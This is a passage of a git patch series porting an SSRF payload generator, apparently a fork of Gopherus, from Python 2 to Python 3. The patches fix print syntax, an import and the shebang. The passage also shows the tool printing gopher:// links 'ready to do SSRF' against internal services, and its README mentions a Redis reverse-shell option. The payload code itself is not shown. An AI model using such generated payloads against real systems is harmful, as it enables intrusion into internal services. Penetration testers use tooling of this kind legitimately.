- print "\033[04m" +"gopher://127.0.0.1:10050/_" + finalpayload+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+ print("\033[93m" +"\nYour gopher link is ready to do SSRF: \n"+ "\033[0m")
+ print("\033[04m" +"gopher://127.0.0.1:10050/_" + finalpayload+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
diff --git a/scripts/__init__.py b/scripts/__init__.py
deleted file mode 100644
index 8b13789..0000000
--- a/scripts/__init__.py
+++ /dev/null
@@ -1 +0,0 @@
-
From 0bc7c7300da37094709df85dee1814c63883e240 Mon Sep 17 00:00:00 2001 From: Antabuse-does-something Date: Sun, 23 Jan 2022 12:30:01 -0500 Subject: [PATCH 2/3] bug fix wrong import --- README.md | 2 +- gopherus3.py | 1 - 2 files changed, 1 insertion(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 387e860..afd4c62 100644
--- a/README.md
+++ b/README.md
@@ -4,7 +4,7 @@ information you can get a blog on the same [Blog on Gopherus](https://spyclub.te
 ## Note :
-This repo is a fork from the Original Tool but I have updated the code from python2 to python3 and added a new feature to select the port for the reverse shell(Redis).
+This repo is a fork from the Original Tool but I have updated the code from python2 to python3 (because python2 is dead) and added a new feature to select the port for the reverse shell(Redis).
 ## About
 This tool can generate payload for following:
diff --git a/gopherus3.py b/gopherus3.py
index 68657a2..8cad4fa 100755
--- a/gopherus3.py
+++ b/gopherus3.py
@@ -1,6 +1,5 @@
 #!/usr/bin/python
 import argparse
-from ast import match_case
 import sys
 sys.path.insert(0, './scripts/')
 from scripts import FastCGI, MySQL, PostgreSQL, DumpMemcached, PHPMemcached, PyMemcached, RbMemcached, Redis, SMTP, Zabbix
From 20a589ac240784edf05f48ac81acde0dbc7f3a24 Mon Sep 17 00:00:00 2001 From: Antabuse-does-something Date: Sun, 23 Jan 2022 12:35:10 -0500 Subject: [PATCH 3/3] Change Shebang --- gopherus3.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/gopherus3.py b/gopherus3.py
index 8cad4fa..6dc9b28 100755
--- a/gopherus3.py
+++ b/gopherus3.py
@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/env python3
 import argparse
 import sys
 sys.path.insert(0, './scripts/')